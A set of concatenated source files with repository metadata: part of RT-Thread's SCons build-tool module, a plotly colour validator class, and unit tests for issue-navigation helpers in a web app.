              help = 'print verbose information during build')

    Env = env
    Rtt_Root = os.path.abspath(root_directory)

    # make an absolute root directory
    RTT_ROOT = Rtt_Root
    Export('RTT_ROOT')

    # set RTT_ROOT in ENV
    Env['RTT_ROOT'] = Rtt_Root
    # set BSP_ROOT in ENV
    Env['BSP_ROOT'] = Dir('#').abspath

    sys.path = sys.path + [os.path.join(Rtt_Root, 'tools')]

    # {target_name:(CROSS_TOOL, PLATFORM)}
    tgt_dict = {'mdk':('keil', 'armcc'),
                'mdk4':('keil', 'armcc'),
                'mdk5':('keil', 'armcc'),
                'iar':('iar', 'iar'),
                'vs':('msvc', 'cl'),
                'vs2012':('msvc', 'cl'),
                'vsc' : ('gcc', 'gcc'),
                'cb':('keil', 'armcc'),
                'ua':('gcc', 'gcc'),
                'cdk':('gcc', 'gcc'),
                'makefile':('gcc', 'gcc'),
                'eclipse':('gcc', 'gcc'),
                'ses' : ('gcc', 'gcc')}
    tgt_name = GetOption('target')

    if tgt_name:
        # --target will change the toolchain settings which clang-analyzer is
        # depend on
        if GetOption('clang-analyzer'):
            print ('--clang-analyzer cannot be used with --target')
            sys.exit(1)

        # Project generation only: don't actually compile anything.
        SetOption('no_exec', 1)
        try:
            rtconfig.CROSS_TOOL, rtconfig.PLATFORM = tgt_dict[tgt_name]
            # replace the 'RTT_CC' to 'CROSS_TOOL'
            os.environ['RTT_CC'] = rtconfig.CROSS_TOOL
            utils.ReloadModule(rtconfig)
        except KeyError:
            print ('Unknow target: '+ tgt_name+'. Avaible targets: ' +', '.join(tgt_dict.keys()))
            sys.exit(1)
    elif (GetDepend('RT_USING_NEWLIB') == False and GetDepend('RT_USING_NOLIBC') == False) \
        and rtconfig.PLATFORM == 'gcc':
        AddDepend('RT_USING_MINILIBC')

    # auto change the 'RTT_EXEC_PATH' when 'rtconfig.EXEC_PATH' get failed
    if not os.path.exists(rtconfig.EXEC_PATH):
        if 'RTT_EXEC_PATH' in os.environ:
            # del the 'RTT_EXEC_PATH' and using the 'EXEC_PATH' setting on rtconfig.py
            del os.environ['RTT_EXEC_PATH']
            utils.ReloadModule(rtconfig)

    # add compability with Keil MDK 4.6 which changes the directory of armcc.exe
    if rtconfig.PLATFORM == 'armcc' or rtconfig.PLATFORM == 'armclang':
        if rtconfig.PLATFORM == 'armcc' and not os.path.isfile(os.path.join(rtconfig.EXEC_PATH, 'armcc.exe')):
            if rtconfig.EXEC_PATH.find('bin40') > 0:
                rtconfig.EXEC_PATH = rtconfig.EXEC_PATH.replace('bin40', 'armcc/bin')
                Env['LINKFLAGS'] = Env['LINKFLAGS'].replace('RV31', 'armcc')

        # reset AR command flags
        env['ARCOM'] = '$AR --create $TARGET $SOURCES'
        env['LIBPREFIX'] = ''
        env['LIBSUFFIX'] = '.lib'
        env['LIBLINKPREFIX'] = ''
        env['LIBLINKSUFFIX'] = '.lib'
        env['LIBDIRPREFIX'] = '--userlibpath '
    elif rtconfig.PLATFORM == 'iar':
        env['LIBPREFIX'] = ''
        env['LIBSUFFIX'] = '.a'
        env['LIBLINKPREFIX'] = ''
        env['LIBLINKSUFFIX'] = '.a'
        env['LIBDIRPREFIX'] = '--search '

    # patch for win32 spawn
    if env['PLATFORM'] == 'win32':
        win32_spawn = Win32Spawn()
        win32_spawn.env = env
        env['SPAWN'] = win32_spawn.spawn

    if env['PLATFORM'] == 'win32':
        os.environ['PATH'] = rtconfig.EXEC_PATH + ";" + os.environ['PATH']
    else:
        os.environ['PATH'] = rtconfig.EXEC_PATH + ":" + os.environ['PATH']

    # add program path
    env.PrependENVPath('PATH', os.environ['PATH'])
    # add rtconfig.h/BSP path into Kernel group
    DefineGroup("Kernel", [], [], CPPPATH=[str(Dir('#').abspath)])

    # add library build action
    act = SCons.Action.Action(BuildLibInstallAction, 'Install compiled library... $TARGET')
    bld = Builder(action = act)
    Env.Append(BUILDERS = {'BuildLib': bld})

    # parse rtconfig.h to get used component
    PreProcessor = PatchedPreProcessor()
    f = open('rtconfig.h', 'r')
    contents = f.read()
    f.close()
    PreProcessor.process_contents(contents)
    BuildOptions = PreProcessor.cpp_namespace

    if GetOption('clang-analyzer'):
        # perform what scan-build does
        env.Replace(
                CC = 'ccc-analyzer',
                CXX = 'c++-analyzer',
                # skip as and link
                LINK = 'true',
                AS = 'true',)
        env["ENV"].update(x for x in os.environ.items() if x[0].startswith("CCC_"))
        # only check, don't compile. ccc-analyzer use CCC_CC as the CC.
        # fsyntax-only will give us some additional warning messages
        env['ENV']['CCC_CC'] = 'clang'
        env.Append(CFLAGS=['-fsyntax-only', '-Wall', '-Wno-invalid-source-encoding'])
        env['ENV']['CCC_CXX'] = 'clang++'
        env.Append(CXXFLAGS=['-fsyntax-only', '-Wall', '-Wno-invalid-source-encoding'])

        # remove the POST_ACTION as it will cause meaningless errors(file not
        # found or something like that).
        rtconfig.POST_ACTION = ''

    # generate cconfig.h file
    GenCconfigFile(env, BuildOptions)

    # auto append '_REENT_SMALL' when using newlib 'nano.specs' option
    if rtconfig.PLATFORM == 'gcc' and str(env['LINKFLAGS']).find('nano.specs') != -1:
        env.AppendUnique(CPPDEFINES = ['_REENT_SMALL'])

    if GetOption('genconfig'):
        from genconf import genconfig
        genconfig()
        exit(0)

    # Kconfig front-ends: text menuconfig is POSIX-only, the Python GUI
    # variants work everywhere.
    if env['PLATFORM'] != 'win32':
        AddOption('--menuconfig',
                  dest = 'menuconfig',
                  action = 'store_true',
                  default = False,
                  help = 'make menuconfig for RT-Thread BSP')
        if GetOption('menuconfig'):
            from menuconfig import menuconfig
            menuconfig(Rtt_Root)
            exit(0)

    AddOption('--pyconfig',
              dest = 'pyconfig',
              action = 'store_true',
              default = False,
              help = 'Python GUI menuconfig for RT-Thread BSP')
    AddOption('--pyconfig-silent',
              dest = 'pyconfig_silent',
              action = 'store_true',
              default = False,
              help = 'Don`t show pyconfig window')

    if GetOption('pyconfig_silent'):
        from menuconfig import guiconfig_silent
        guiconfig_silent(Rtt_Root)
        exit(0)
    elif GetOption('pyconfig'):
        from menuconfig import guiconfig
        guiconfig(Rtt_Root)
        exit(0)

    configfn = GetOption('useconfig')
    if configfn:
        from menuconfig import mk_rtconfig
        mk_rtconfig(configfn)
        exit(0)

    if not GetOption('verbose'):
        # override the default verbose command string
        env.Replace(
            ARCOMSTR = 'AR $TARGET',
            ASCOMSTR = 'AS $TARGET',
            ASPPCOMSTR = 'AS $TARGET',
            CCCOMSTR = 'CC $TARGET',
            CXXCOMSTR = 'CXX $TARGET',
            LINKCOMSTR = 'LINK $TARGET'
        )

    # fix the linker for C++
    if GetDepend('RT_USING_CPLUSPLUS'):
        if env['LINK'].find('gcc') != -1:
            env['LINK'] = env['LINK'].replace('gcc', 'g++')

    # we need to seperate the variant_dir for BSPs and the kernels. BSPs could
    # have their own components etc. If they point to the same folder, SCons
    # would find the wrong source code to compile.
    bsp_vdir = 'build'
    kernel_vdir = 'build/kernel'
    # board build script
    objs = SConscript('SConscript', variant_dir=bsp_vdir, duplicate=0)
    # include kernel
    objs.extend(SConscript(Rtt_Root + '/src/SConscript', variant_dir=kernel_vdir + '/src', duplicate=0))
    # include libcpu
    if not has_libcpu:
        objs.extend(SConscript(Rtt_Root + '/libcpu/SConscript',
                    variant_dir=kernel_vdir + '/libcpu', duplicate=0))

    # include components
    objs.extend(SConscript(Rtt_Root + '/components/SConscript',
                           variant_dir=kernel_vdir + '/components',
                           duplicate=0,
                           exports='remove_components'))

    return objs
def PrepareModuleBuilding(env, root_directory, bsp_directory):
    """Prepare the SCons environment for building an application module.

    Parses <bsp_directory>/rtconfig.h into the global BuildOptions,
    installs the Windows spawn workaround, and registers the
    --buildlib/--cleanlib options.

    :param env: SCons construction environment.
    :param root_directory: RT-Thread root directory.
    :param bsp_directory: BSP directory containing rtconfig.h.
    """
    import rtconfig

    global BuildOptions
    global Env
    global Rtt_Root

    # patch for win32 spawn
    if env['PLATFORM'] == 'win32':
        win32_spawn = Win32Spawn()
        win32_spawn.env = env
        env['SPAWN'] = win32_spawn.spawn

    Env = env
    Rtt_Root = root_directory

    # parse bsp rtconfig.h to get used component
    PreProcessor = PatchedPreProcessor()
    # Context manager guarantees the header is closed even if read fails.
    with open(bsp_directory + '/rtconfig.h', 'r') as f:
        contents = f.read()
    PreProcessor.process_contents(contents)
    BuildOptions = PreProcessor.cpp_namespace

    # add build/clean library option for library checking
    AddOption('--buildlib',
              dest='buildlib',
              type='string',
              help='building library of a component')
    AddOption('--cleanlib',
              dest='cleanlib',
              action='store_true',
              default=False,
              help='clean up the library by --buildlib')

    # add program path
    env.PrependENVPath('PATH', rtconfig.EXEC_PATH)
def GetConfigValue(name):
    """Return the value of macro *name* parsed from rtconfig.h, or ''
    when the macro is not defined.

    :param name: macro name (must be a string).
    """
    assert type(name) == str, 'GetConfigValue: only string parameter is valid'
    # Catch only the missing-key case; the original bare 'except:' would
    # also have hidden genuine programming errors.
    try:
        return BuildOptions[name]
    except KeyError:
        return ''
def GetDepend(depend):
    """Evaluate a dependency against the macros parsed from rtconfig.h.

    A single macro name returns its value when it has a non-empty one,
    True when the macro is defined but empty, and False when it is
    undefined or zero.  A list of names returns True only when every
    non-empty entry is enabled.
    """
    if isinstance(depend, str):
        value = BuildOptions.get(depend, 0)
        if value == 0:
            # undefined, or explicitly defined as 0
            return False
        if value != '':
            return value
        return True

    # list/tuple of macro names: all non-empty entries must be enabled
    for macro in depend:
        if macro == '':
            continue
        if BuildOptions.get(macro, 0) == 0:
            return False
    return True
def LocalOptions(config_filename):
    """Parse *config_filename* (a C header of #define macros) and return
    its macro namespace as a dict, without touching the global options.

    :param config_filename: path of the header to parse.
    :return: dict mapping macro names to values.
    """
    from SCons.Script import SCons

    # parse wiced_config.h to get used component
    PreProcessor = SCons.cpp.PreProcessor()

    # Context manager guarantees the file is closed even on read errors.
    with open(config_filename, 'r') as f:
        contents = f.read()
    PreProcessor.process_contents(contents)

    local_options = PreProcessor.cpp_namespace

    return local_options
def GetLocalDepend(options, depend):
    """Like GetDepend(), but evaluate against an explicit *options* dict
    (e.g. the result of LocalOptions()) instead of the global one.
    """
    if isinstance(depend, str):
        value = options.get(depend, 0)
        if value == 0:
            # undefined, or explicitly defined as 0
            return False
        if value != '':
            return value
        return True

    # list/tuple of macro names: all non-empty entries must be enabled
    for macro in depend:
        if macro == '':
            continue
        if options.get(macro, 0) == 0:
            return False
    return True
def AddDepend(option):
    """Mark macro *option* as enabled in the global build options."""
    BuildOptions[option] = 1
def MergeGroup(src_group, group):
    """Merge the build settings of *group* into *src_group* in place.

    The 'src' lists are always concatenated.  Every other recognised
    list-valued setting is concatenated when present in both groups, or
    copied over when it only exists in *group*.

    :param src_group: destination group dict (mutated).
    :param group: source group dict (read only).
    """
    src_group['src'] = src_group['src'] + group['src']

    # All of these settings merge identically (concatenate or copy), so
    # the original's eleven copy-pasted if/else ladders collapse into a
    # single data-driven loop.
    _MERGED_KEYS = (
        'CCFLAGS', 'CPPPATH', 'CPPDEFINES', 'ASFLAGS',
        # local (per-group) CCFLAGS/CPPPATH/CPPDEFINES/ASFLAGS
        'LOCAL_CCFLAGS', 'LOCAL_CPPPATH', 'LOCAL_CPPDEFINES', 'LOCAL_ASFLAGS',
        'LINKFLAGS', 'LIBS', 'LIBPATH',
    )
    for key in _MERGED_KEYS:
        if key in group:
            if key in src_group:
                src_group[key] = src_group[key] + group[key]
            else:
                src_group[key] = group[key]
def DefineGroup(name, src, depend, **parameters):
    """Define a build group (component) called *name*.

    Called from component SConscripts.  When the dependency condition in
    *depend* is not satisfied the group is skipped and [] is returned.
    Otherwise the group's flags/paths/defines are merged into the global
    environment, the group is registered in the global Projects list
    (merging with an existing group of the same name), and the list of
    build objects for the group is returned.

    :param name: group name; groups with the same name are merged.
    :param src: list of source files (or an SCons node list).
    :param depend: macro name or list of names gating this group.
    :param parameters: extra settings (CPPPATH, CCFLAGS, LIBS, LIBRARY,
        LOCAL_* variants, ...).
    :return: list of objects for DoBuilding(), or [] when disabled.
    """
    global Env
    if not GetDepend(depend):
        return []

    # find exist group and get path of group
    group_path = ''
    for g in Projects:
        if g['name'] == name:
            group_path = g['path']
    if group_path == '':
        group_path = GetCurrentDir()

    group = parameters
    group['name'] = name
    group['path'] = group_path
    if type(src) == type([]):
        group['src'] = File(src)
    else:
        group['src'] = src

    # Global (whole-build) settings are appended to the environment now;
    # LOCAL_* settings stay group-private and are applied in DoBuilding().
    if 'CCFLAGS' in group:
        Env.AppendUnique(CCFLAGS = group['CCFLAGS'])
    if 'CPPPATH' in group:
        paths = []
        for item in group['CPPPATH']:
            paths.append(os.path.abspath(item))
        group['CPPPATH'] = paths
        Env.AppendUnique(CPPPATH = group['CPPPATH'])
    if 'CPPDEFINES' in group:
        Env.AppendUnique(CPPDEFINES = group['CPPDEFINES'])
    if 'LINKFLAGS' in group:
        Env.AppendUnique(LINKFLAGS = group['LINKFLAGS'])
    if 'ASFLAGS' in group:
        Env.AppendUnique(ASFLAGS = group['ASFLAGS'])
    if 'LOCAL_CPPPATH' in group:
        paths = []
        for item in group['LOCAL_CPPPATH']:
            paths.append(os.path.abspath(item))
        group['LOCAL_CPPPATH'] = paths

    import rtconfig
    if rtconfig.PLATFORM == 'gcc':
        if 'CCFLAGS' in group:
            group['CCFLAGS'] = utils.GCCC99Patch(group['CCFLAGS'])
        if 'LOCAL_CCFLAGS' in group:
            group['LOCAL_CCFLAGS'] = utils.GCCC99Patch(group['LOCAL_CCFLAGS'])

    # check whether to clean up library
    if GetOption('cleanlib') and os.path.exists(os.path.join(group['path'], GroupLibFullName(name, Env))):
        if group['src'] != []:
            print ('Remove library:'+ GroupLibFullName(name, Env))
            fn = os.path.join(group['path'], GroupLibFullName(name, Env))
            if os.path.exists(fn):
                os.unlink(fn)

    if 'LIBS' in group:
        Env.AppendUnique(LIBS = group['LIBS'])
    if 'LIBPATH' in group:
        Env.AppendUnique(LIBPATH = group['LIBPATH'])

    # check whether to build group library
    if 'LIBRARY' in group:
        objs = Env.Library(name, group['src'])
    else:
        # only add source
        objs = group['src']

    # merge group
    for g in Projects:
        if g['name'] == name:
            # merge to this group
            MergeGroup(g, group)
            return objs

    # add a new group
    Projects.append(group)

    return objs
def GetCurrentDir():
    """Return the absolute directory of the SConscript currently being
    processed (the directory containing the 'SConscript' file)."""
    conscript = File('SConscript')
    fn = conscript.rfile()
    # The original also bound 'fn.name' to an unused local; dropped.
    path = os.path.dirname(fn.abspath)
    return path
# Callables registered to run before the main build starts.
PREBUILDING = []

def RegisterPreBuildingAction(act):
    """Register callable *act* for execution by PreBuilding().

    Raises TypeError for non-callables instead of using 'assert', which
    is silently stripped when Python runs with optimization (-O).
    """
    global PREBUILDING
    if not callable(act):
        raise TypeError('Could only register callable objects. %s received'
                        % repr(act))
    PREBUILDING.append(act)

def PreBuilding():
    """Invoke every registered pre-building action, in registration order."""
    global PREBUILDING
    for a in PREBUILDING:
        a()
def GroupLibName(name, env):
    """Return the platform-decorated library name for group *name*
    ('_rvds' for armcc, '_gcc' for gcc, undecorated otherwise)."""
    import rtconfig
    platform_suffix = {'armcc': '_rvds', 'gcc': '_gcc'}
    return name + platform_suffix.get(rtconfig.PLATFORM, '')
def GroupLibFullName(name, env):
    """Return the full library file name: prefix + decorated name + suffix."""
    parts = [env['LIBPREFIX'], GroupLibName(name, env), env['LIBSUFFIX']]
    return ''.join(parts)
def BuildLibInstallAction(target, source, env):
    """SCons action: copy the component library selected via --buildlib
    back into its group's source directory after it has been built."""
    selected = GetOption('buildlib')
    for group in Projects:
        if group['name'] != selected:
            continue
        full_name = GroupLibFullName(group['name'], env)
        dst_name = os.path.join(group['path'], full_name)
        print ('Copy ' + full_name + ' => ' + dst_name)
        do_copy_file(full_name, dst_name)
        break
def DoBuilding(target, objects):
    """Run the build: either build a single component library
    (--buildlib) or link the whole program *target* from *objects*,
    applying per-group LOCAL_* flags where defined.

    :param target: output program name.
    :param objects: (possibly nested) list of build objects collected by
        PrepareBuilding()/DefineGroup().
    """

    # merge all objects into one list
    def one_list(l):
        # Recursively flatten nested lists of objects.
        lst = []
        for item in l:
            if type(item) == type([]):
                lst += one_list(item)
            else:
                lst.append(item)
        return lst

    # handle local group
    def local_group(group, objects):
        # When a group carries LOCAL_* settings its sources must be
        # compiled with group-private flags appended to the global ones;
        # returns True when it took over compilation of the group.
        if 'LOCAL_CCFLAGS' in group or 'LOCAL_CPPPATH' in group or 'LOCAL_CPPDEFINES' in group or 'LOCAL_ASFLAGS' in group:
            CCFLAGS = Env.get('CCFLAGS', '') + group.get('LOCAL_CCFLAGS', '')
            CPPPATH = Env.get('CPPPATH', ['']) + group.get('LOCAL_CPPPATH', [''])
            CPPDEFINES = Env.get('CPPDEFINES', ['']) + group.get('LOCAL_CPPDEFINES', [''])
            ASFLAGS = Env.get('ASFLAGS', '') + group.get('LOCAL_ASFLAGS', '')

            for source in group['src']:
                objects.append(Env.Object(source, CCFLAGS = CCFLAGS, ASFLAGS = ASFLAGS,
                    CPPPATH = CPPPATH, CPPDEFINES = CPPDEFINES))

            return True

        return False

    objects = one_list(objects)

    program = None
    # check whether special buildlib option
    lib_name = GetOption('buildlib')
    if lib_name:
        objects = [] # remove all of objects
        # build library with special component
        for Group in Projects:
            if Group['name'] == lib_name:
                lib_name = GroupLibName(Group['name'], Env)
                if not local_group(Group, objects):
                    objects = Env.Object(Group['src'])

                program = Env.Library(lib_name, objects)

                # add library copy action
                Env.BuildLib(lib_name, program)

                break
    else:
        # remove source files with local flags setting
        for group in Projects:
            if 'LOCAL_CCFLAGS' in group or 'LOCAL_CPPPATH' in group or 'LOCAL_CPPDEFINES' in group:
                for source in group['src']:
                    for obj in objects:
                        if source.abspath == obj.abspath or (len(obj.sources) > 0 and source.abspath == obj.sources[0].abspath):
                            objects.remove(obj)

        # re-add the source files to the objects
        for group in Projects:
            local_group(group, objects)

        program = Env.Program(target, objects)

    EndBuilding(target, program)
def GenTargetProject(program = None):
    """Generate an IDE/build-system project for the --target option.

    Dispatches on the requested target name; each branch imports its
    generator lazily so that unused back-ends are never loaded.
    """
    target = GetOption('target')

    if target == 'mdk':
        from keil import MDKProject
        from keil import MDK4Project
        from keil import MDK5Project

        # Pick the generator matching whichever Keil template exists.
        if os.path.isfile('template.Uv2'):
            MDKProject('project.Uv2', Projects)
        elif os.path.isfile('template.uvproj'):
            MDK4Project('project.uvproj', Projects)
        elif os.path.isfile('template.uvprojx'):
            MDK5Project('project.uvprojx', Projects)
        else:
            print ('No template project file found.')
    elif target == 'mdk4':
        from keil import MDK4Project
        MDK4Project('project.uvproj', Projects)
    elif target == 'mdk5':
        from keil import MDK5Project
        MDK5Project('project.uvprojx', Projects)
    elif target == 'iar':
        from iar import IARProject
        IARProject('project.ewp', Projects)
    elif target == 'vs':
        from vs import VSProject
        VSProject('project.vcproj', Projects, program)
    elif target == 'vs2012':
        from vs2012 import VS2012Project
        VS2012Project('project.vcxproj', Projects, program)
    elif target == 'cb':
        from codeblocks import CBProject
        CBProject('project.cbp', Projects, program)
    elif target == 'ua':
        from ua import PrepareUA
        PrepareUA(Projects, Rtt_Root, str(Dir('#')))
    elif target == 'vsc':
        from vsc import GenerateVSCode
        GenerateVSCode(Env)
    elif target == 'cdk':
        from cdk import CDKProject
        CDKProject('project.cdkproj', Projects)
    elif target == 'ses':
        from ses import SESProject
        SESProject(Env)
    elif target == 'makefile':
        from makefile import TargetMakefile
        TargetMakefile(Env)
    elif target == 'eclipse':
        from eclipse import TargetEclipse
        TargetEclipse(Env, GetOption('reset-project-config'), GetOption('project-name'))
def EndBuilding(target, program = None):
    """Finish the build: attach post-build actions and clean targets,
    then honour project-generation / distribution / cscope options.

    :param target: the program target node/name just built.
    :param program: the SCons program node (None when building a lib).
    """
    import rtconfig

    need_exit = False

    Env['target'] = program
    Env['project'] = Projects

    if hasattr(rtconfig, 'BSP_LIBRARY_TYPE'):
        Env['bsp_lib_type'] = rtconfig.BSP_LIBRARY_TYPE

    if hasattr(rtconfig, 'dist_handle'):
        Env['dist_handle'] = rtconfig.dist_handle

    Env.AddPostAction(target, rtconfig.POST_ACTION)
    # Add addition clean files
    Clean(target, 'cconfig.h')
    Clean(target, 'rtua.py')
    Clean(target, 'rtua.pyc')

    if GetOption('target'):
        GenTargetProject(program)

    BSP_ROOT = Dir('#').abspath
    # NOTE(review): unlike --dist-strip and --dist-ide below, the plain
    # --dist branch does not set need_exit — confirm whether that is
    # intentional or an oversight.
    if GetOption('make-dist') and program != None:
        from mkdist import MkDist
        MkDist(program, BSP_ROOT, Rtt_Root, Env)
    if GetOption('make-dist-strip') and program != None:
        from mkdist import MkDist_Strip
        MkDist_Strip(program, BSP_ROOT, Rtt_Root, Env)
        need_exit = True
    if GetOption('make-dist-ide') and program != None:
        from mkdist import MkDist
        # --project-path and --project-name are both mandatory here.
        project_path = GetOption('project-path')
        project_name = GetOption('project-name')

        if not isinstance(project_path, str) or len(project_path) == 0 :
            print("\nwarning : --project-path=your_project_path parameter is required.")
            print("\nstop!")
            exit(0)
        if not isinstance(project_name, str) or len(project_name) == 0:
            print("\nwarning : --project-name=your_project_name parameter is required.")
            print("\nstop!")
            exit(0)

        rtt_ide = {'project_path' : project_path, 'project_name' : project_name}
        MkDist(program, BSP_ROOT, Rtt_Root, Env, rtt_ide)
        need_exit = True
    if GetOption('cscope'):
        from cscope import CscopeDatabase
        CscopeDatabase(Projects)

    if not GetOption('help') and not GetOption('target'):
        if not os.path.exists(rtconfig.EXEC_PATH):
            print ("Error: the toolchain path (" + rtconfig.EXEC_PATH + ") is not exist, please check 'EXEC_PATH' in path or rtconfig.py.")
            need_exit = True

    if need_exit:
        exit(0)
def SrcRemove(src, remove):
    """Remove entries from source list *src* in place.

    *remove* may be a single path string or a list of paths/nodes.
    Paths are compared after normalization (absolute paths are made
    relative to the current SConscript directory), so different
    spellings of the same file still match.

    :param src: list of source paths (strings or SCons File nodes);
        mutated in place.
    :param remove: path string, or iterable of paths/nodes, to remove.
    """
    if not src:
        return

    def _norm(path):
        # Normalize to a path relative to the current SConscript dir so
        # absolute and relative spellings compare equal.
        if os.path.isabs(path):
            path = os.path.relpath(path, GetCurrentDir())
        return os.path.normpath(path)

    def _name_of(item):
        # src entries may be plain strings or SCons File nodes.
        if type(item) == type('str'):
            return item
        return item.rstr()

    # Build the set of normalized paths to drop; the original duplicated
    # the normalize-and-scan logic for the string and list cases, and
    # could call list.remove() twice on the same element.
    if type(remove) == type('str'):
        targets = {_norm(remove)}
    else:
        targets = {_norm(str(remove_item)) for remove_item in remove}

    for item in src[:]:
        if _norm(_name_of(item)) in targets:
            src.remove(item)
def GetVersion():
    """Return the RT-Thread version string parsed from include/rtdef.h.

    Returns 'major.minor.revision' when RT_REVISION is defined in
    rtdef.h, otherwise the historical '0.major.minor' form.
    """
    import SCons.cpp

    rtdef = os.path.join(Rtt_Root, 'include', 'rtdef.h')

    # parse rtdef.h to get RT-Thread version
    prepcessor = PatchedPreProcessor()
    with open(rtdef, 'r') as f:
        contents = f.read()
    prepcessor.process_contents(contents)
    def_ns = prepcessor.cpp_namespace

    def _macro_int(text):
        # BUG FIX: the original called int(filter(...)), which fails on
        # Python 3 because filter() returns an iterator, not a string;
        # it also kept '.' which would break int() anyway.  Keep digits
        # only and convert the joined result.
        return int(''.join(ch for ch in str(text) if ch in '0123456789'))

    version = _macro_int(def_ns['RT_VERSION'])
    subversion = _macro_int(def_ns['RT_SUBVERSION'])

    if 'RT_REVISION' in def_ns:
        revision = _macro_int(def_ns['RT_REVISION'])
        return '%d.%d.%d' % (version, subversion, revision)

    return '0.%d.%d' % (version, subversion)
def GlobSubDir(sub_dir, ext_name):
    """Recursively glob for *ext_name* (e.g. '*.c') under *sub_dir*.

    :param sub_dir: directory to search.
    :param ext_name: glob pattern matched in every (sub)directory.
    :return: list of matching paths relative to *sub_dir*.
    """
    import glob

    def glob_source(directory, pattern):
        # Collect matches here, then descend into subdirectories.  (The
        # original named its directory listing 'list', shadowing the
        # builtin, and redundantly re-imported os.)
        matches = glob.glob(os.path.join(directory, pattern))
        for entry in os.listdir(directory):
            full_subdir = os.path.join(directory, entry)
            if os.path.isdir(full_subdir):
                matches += glob_source(full_subdir, pattern)
        return matches

    dst = []
    for item in glob_source(sub_dir, ext_name):
        dst.append(os.path.relpath(item, sub_dir))
    return dst
def PackageSConscript(package):
    """Build an RT-Thread package by delegating to the project's
    ``package`` module.

    ``package`` -- the package description passed straight through to
    BuildPackage; returns whatever BuildPackage returns.
    """
    # Imported lazily so the tool works even when the package module is
    # only needed for package builds.
    from package import BuildPackage

    return BuildPackage(package)
| {
"content_hash": "f056592e638612d63653b53ccad72da7",
"timestamp": "",
"source": "github",
"line_count": 982,
"max_line_length": 139,
"avg_line_length": 33.95723014256619,
"alnum_prop": 0.5618365021291909,
"repo_name": "weiyuliang/rt-thread",
"id": "65af7944345fb7ce1ac63dbc260d7b152c33c536",
"size": "34428",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/building.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "10845457"
},
{
"name": "Batchfile",
"bytes": "187090"
},
{
"name": "C",
"bytes": "585304292"
},
{
"name": "C++",
"bytes": "8035069"
},
{
"name": "CMake",
"bytes": "148026"
},
{
"name": "CSS",
"bytes": "9978"
},
{
"name": "DIGITAL Command Language",
"bytes": "13234"
},
{
"name": "GDB",
"bytes": "11796"
},
{
"name": "HTML",
"bytes": "1646865"
},
{
"name": "Lex",
"bytes": "7026"
},
{
"name": "Logos",
"bytes": "7078"
},
{
"name": "M4",
"bytes": "17515"
},
{
"name": "Makefile",
"bytes": "271627"
},
{
"name": "Module Management System",
"bytes": "1548"
},
{
"name": "Objective-C",
"bytes": "4109718"
},
{
"name": "Pawn",
"bytes": "2854"
},
{
"name": "Perl",
"bytes": "9520"
},
{
"name": "PowerShell",
"bytes": "1628"
},
{
"name": "Python",
"bytes": "1553852"
},
{
"name": "RPC",
"bytes": "14162"
},
{
"name": "Rich Text Format",
"bytes": "177701"
},
{
"name": "Roff",
"bytes": "4486"
},
{
"name": "Ruby",
"bytes": "869"
},
{
"name": "Shell",
"bytes": "407900"
},
{
"name": "TeX",
"bytes": "3113"
},
{
"name": "Yacc",
"bytes": "16084"
}
],
"symlink_target": ""
} |
import _plotly_utils.basevalidators
class ColorValidator(_plotly_utils.basevalidators.ColorValidator):
    """Validator for the ``volume.contour.color`` property."""

    def __init__(self, plotly_name="color", parent_name="volume.contour", **kwargs):
        # Pull the defaults out of kwargs first so callers may override them.
        edit_type = kwargs.pop("edit_type", "calc")
        role = kwargs.pop("role", "style")
        super(ColorValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=edit_type,
            role=role,
            **kwargs
        )
| {
"content_hash": "98ec4867c2ea600fed991e534ad31e4e",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 84,
"avg_line_length": 36.833333333333336,
"alnum_prop": 0.6063348416289592,
"repo_name": "plotly/python-api",
"id": "96ede4f0c426915490b176fc32b5034805f6a9b0",
"size": "442",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/volume/contour/_color.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "JavaScript",
"bytes": "6870"
},
{
"name": "Makefile",
"bytes": "1708"
},
{
"name": "Python",
"bytes": "823245"
},
{
"name": "Shell",
"bytes": "3238"
}
],
"symlink_target": ""
} |
from .base import BaseTestCase
from . import utils
from webapp import utils as wutils
class UtilsTestCase(BaseTestCase):
    """Tests for the issue/article navigation helpers in webapp.utils.

    NOTE(review): the issue lists handled by get_prev_issue/get_next_issue
    are "inverted" per the original (Portuguese) docstrings — the helpers'
    index arithmetic assumes that ordering; confirm against webapp.utils.
    """

    # Issue
    def test_get_prev_issue(self):
        """
        Test of utils.get_prev_issue().
        IMPORTANT: the issue list is inverted.
        """
        issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '1', 'order': '1', })
        issue2 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '2', 'order': '2', })
        issue3 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '3', 'order': '3', })
        # build an ordered list of issues
        issues = [issue1, issue2, issue3]
        prev_issue = wutils.get_prev_issue(issues, issue2)
        self.assertEqual(prev_issue, issue3)

    def test_get_next_issue(self):
        """
        Test of utils.get_next_issue().
        IMPORTANT: the issue list is inverted.
        """
        issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '1', 'order': '1', })
        issue2 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '2', 'order': '2', })
        issue3 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '3', 'order': '3', })
        # build an ordered list of issues
        issues = [issue1, issue2, issue3]
        next_issue = wutils.get_next_issue(issues, issue2)
        self.assertEqual(next_issue, issue1)

    def test_get_prev_issue_with_one_item(self):
        """
        Test of utils.get_prev_issue() when the requested issue is not in
        the list; must return None.
        """
        issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '1', 'order': '1', })
        issue = utils.makeOneIssue()
        # list containing a single, unrelated issue
        issues = [issue1]
        prev_issue = wutils.get_prev_issue(issues, issue)
        self.assertIsNone(prev_issue)

    def test_get_next_issue_with_one_item(self):
        """
        Test of utils.get_next_issue() when the requested issue is not in
        the list; must return None.
        """
        issue1 = utils.makeOneIssue({'year': '2016', 'volume': '1',
                                     'number': '1', 'order': '1', })
        issue = utils.makeOneIssue()
        # list containing a single, unrelated issue
        issues = [issue1]
        next_issue = wutils.get_next_issue(issues, issue)
        self.assertIsNone(next_issue)

